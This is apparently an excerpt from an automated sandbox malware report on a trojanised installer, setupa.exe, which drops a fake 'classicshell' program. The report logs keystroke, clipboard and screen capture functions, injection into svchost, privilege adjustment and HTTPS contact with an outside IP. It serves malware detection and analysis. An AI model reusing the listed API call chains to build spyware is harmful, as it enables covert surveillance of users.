                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49706 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture and log keystrokes
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]4_2_04DFE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]4_2_04DFE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]4_2_04DFE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]4_2_04DFE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]12_2_052BE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]12_2_052BE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]12_2_052BE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: [esc]12_2_052BE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFE8A0 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_04DFE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFE8A0 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_04DFE8A0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFBCC0 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,4_2_04DFBCC0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFE540 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,4_2_04DFE540
                      Source: C:\Windows\SysWOW64\svchost.exeWindows user hook set: 0 mouse low level C:\Windows\System32\DINPUT8.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64AJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Jump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187Jump to dropped file
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689643D78 NtQueryInformationProcess,RtlNtStatusToDosError,0_2_00007FF689643D78
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E094DD0 NtUnloadDllMemoryAndExitThread,3_2_6E094DD0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFB48F ExitWindowsEx,4_2_04DFB48F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFB4B3 ExitWindowsEx,4_2_04DFB4B3
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFB46B ExitWindowsEx,4_2_04DFB46B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052BB46B ExitWindowsEx,12_2_052BB46B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052BB4B3 ExitWindowsEx,12_2_052BB4B3
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052BB48F ExitWindowsEx,12_2_052BB48F
                      Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\c2786235-70ab-4cdc-b58e-997eca54c008Jump to behavior
                      Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5DJump to behavior
                      Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5DJump to behavior
                      Source: C:\Windows\System32\lsass.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5DJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6897275280_2_00007FF689727528
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896460C30_2_00007FF6896460C3
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964230B0_2_00007FF68964230B
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964430E0_2_00007FF68964430E
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896449C60_2_00007FF6896449C6
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641D570_2_00007FF689641D57
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689647C750_2_00007FF689647C75
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896418660_2_00007FF689641866
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896434B80_2_00007FF6896434B8
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896470A90_2_00007FF6896470A9
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896458940_2_00007FF689645894
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68971B46C0_2_00007FF68971B46C
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689645F150_2_00007FF689645F15
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964277A0_2_00007FF68964277A
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896449530_2_00007FF689644953
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689642A590_2_00007FF689642A59
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964522C0_2_00007FF68964522C
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896451FF0_2_00007FF6896451FF
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689647D920_2_00007FF689647D92
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896421760_2_00007FF689642176
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896469A60_2_00007FF6896469A6
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896445520_2_00007FF689644552
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896441880_2_00007FF689644188
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689642AF90_2_00007FF689642AF9
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896469A60_2_00007FF6896469A6
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896423560_2_00007FF689642356
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964497B0_2_00007FF68964497B
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641B810_2_00007FF689641B81
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896410F00_2_00007FF6896410F0
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964471E0_2_00007FF68964471E
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896470400_2_00007FF689647040
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896441420_2_00007FF689644142
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964648D0_2_00007FF68964648D
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964470A0_2_00007FF68964470A
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964153C0_2_00007FF68964153C
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896427070_2_00007FF689642707
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC7B001_2_00000140ADFC7B00
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD06281_2_00000140ADFD0628
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC8D781_2_00000140ADFC8D78
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFCACAC1_2_00000140ADFCACAC
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC3BC41_2_00000140ADFC3BC4
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFCCB8C1_2_00000140ADFCCB8C
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC8F841_2_00000140ADFC8F84
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFCC7601_2_00000140ADFCC760
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C294E93_2_00C294E9
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C304F13_2_00C304F1
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C3248D3_2_00C3248D
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C316713_2_00C31671
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C30A353_2_00C30A35
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C30F793_2_00C30F79
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A97F93_2_6E0A97F9
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0ADEE63_2_6E0ADEE6
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0B4D203_2_6E0B4D20
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0AFB553_2_6E0AFB55
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0AA2D03_2_6E0AA2D0
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0B51CE3_2_6E0B51CE
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_1000D0A13_2_1000D0A1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02592E814_2_02592E81
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0258B75E4_2_0258B75E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02591F4C4_2_02591F4C
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0259131F4_2_0259131F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_025918704_2_02591870
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_025824B04_2_025824B0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02590DCE4_2_02590DCE
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF6CA04_2_04DF6CA0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF6F304_2_04DF6F30
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF24B04_2_04DF24B0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E0DE404_2_04E0DE40
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E0D8EF4_2_04E0D8EF
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF89504_2_04DF8950
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E0EA6D4_2_04E0EA6D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E0FA4F4_2_04E0FA4F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E083D14_2_04E083D1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E0E3914_2_04E0E391
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A1123D4_2_02A1123D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A01E7D4_2_02A01E7D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A1079B4_2_02A1079B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A10CEC4_2_02A10CEC
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A1A02E4_2_02A1A02E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A1284E4_2_02A1284E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A0B12B4_2_02A0B12B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C8F40E4_2_04C8F40E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C87D904_2_04C87D90
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C8DD504_2_04C8DD50
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C7665F4_2_04C7665F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C71E6F4_2_04C71E6F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C8D7FF4_2_04C8D7FF
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C768EF4_2_04C768EF
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C8D2AE4_2_04C8D2AE
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C7830F4_2_04C7830F
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_1000D0A111_2_1000D0A1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F72E8112_2_02F72E81
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F6B75E12_2_02F6B75E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F71F4C12_2_02F71F4C
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F7131F12_2_02F7131F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F624B012_2_02F624B0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F7187012_2_02F71870
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F70DCE12_2_02F70DCE
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B6CA012_2_052B6CA0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B6F3012_2_052B6F30
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B24B012_2_052B24B0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052CDE4012_2_052CDE40
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B895012_2_052B8950
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052CD8EF12_2_052CD8EF
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052CE39112_2_052CE391
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052C83D112_2_052C83D1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052CEA6D12_2_052CEA6D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052CFA4F12_2_052CFA4F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02ED1E7D12_2_02ED1E7D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02EE123D12_2_02EE123D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02EE079B12_2_02EE079B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02EE0CEC12_2_02EE0CEC
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02EE284E12_2_02EE284E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02EEA02E12_2_02EEA02E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02EDB12B12_2_02EDB12B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0514DD5012_2_0514DD50
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05147D9012_2_05147D90
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0514F40E12_2_0514F40E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0514D7FF12_2_0514D7FF
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0513665F12_2_0513665F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05131E6F12_2_05131E6F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_051368EF12_2_051368EF
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0513830F12_2_0513830F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0514D2AE12_2_0514D2AE
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: String function: 00C26684 appears 36 times
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: String function: 10004100 appears 31 times
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 04E04350 appears 32 times
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 05143D0F appears 31 times
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 04C83D0F appears 31 times
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 052C4350 appears 32 times
                      Source: C:\Users\user\Desktop\setupa.exeCode function: String function: 00007FF68964681B appears 37 times
                      Source: C:\Users\user\Desktop\setupa.exeCode function: String function: 00007FF6897A8138 appears 55 times
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: String function: 10004100 appears 31 times
                      Source: C:\Program Files\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480
                      Source: setupa.exe, 00000000.00000002.2202710108.000001F5DCDD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameupupoo-classicshell.exe< vs setupa.exe
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/41@1/2
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689647D83 FormatMessageA,GetLastError,LocalFree,0_2_00007FF689647D83
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF7670 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,4_2_04DF7670
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF7790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_04DF7790
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF7BC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,4_2_04DF7BC0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B7790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,12_2_052B7790
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B7670 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,12_2_052B7670
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B7BC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,12_2_052B7BC0
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF6CA0 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,4_2_04DF6CA0
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC0286 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,CloseHandle,1_2_00000140ADFC0286
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF66E0 CoInitialize,CoCreateInstance,SysFreeString,SysFreeString,CoUninitialize,4_2_04DF66E0
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896414D8 GetModuleHandleA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,FindResourceA,FindResourceExA,LoadResource,SizeofResource,LockResource,0_2_00007FF6896414D8
                      Source: C:\Users\user\Desktop\setupa.exeFile created: C:\Program Files\ClassicStartMenuDLL.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\e481ff35-c61f-4b35-b72d-22da10d15209Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 9.23
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1308
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5696
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b4682187-afd5-4594-b3e6-e0a5103deabdJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: user32.dll3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -startup3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: Tsn3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -autorun3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -autorun3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: WinVersion3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -upgrade3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: runas3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: AutoStart3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: AutoStartDelay3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: AutoStart3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: AutoStartDelay3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -upgrade3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: WinVersion3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: %s%s3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: .dll3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -runas3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: PDGu3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -togglenew3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -toggle3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -open3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -settings3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -exit3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -reloadsettings3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: -nohook3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: Default3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: Progman3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: StartHookWindow3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: Shell_TrayWnd3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: StartHookWindow3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: TaskbarCreated3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCommand line argument: user32.dll3_2_00C21CE0
                      Source: setupa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\setupa.exeFile read: C:\Program Files\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: setupa.exeVirustotal: Detection: 11%
                      Source: upupoo-classicshell.exeString found in binary or memory: -startup
                      Source: unknownProcess created: C:\Users\user\Desktop\setupa.exe "C:\Users\user\Desktop\setupa.exe"
                      Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                      Source: C:\Users\user\Desktop\setupa.exeProcess created: C:\Program Files\upupoo-classicshell.exe "C:\Program Files\upupoo-classicshell.exe"
                      Source: C:\Program Files\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Program Files\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480
                      Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: C:\Windows\System32\lsass.exeProcess created: C:\Users\Public\Documents\upupoo-classicshell.exe "C:\Users\Public\Documents\upupoo-classicshell.exe"
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 488
                      Source: C:\Users\user\Desktop\setupa.exeProcess created: C:\Program Files\upupoo-classicshell.exe "C:\Program Files\upupoo-classicshell.exe" Jump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: rasadhlp.dllJump to behavior
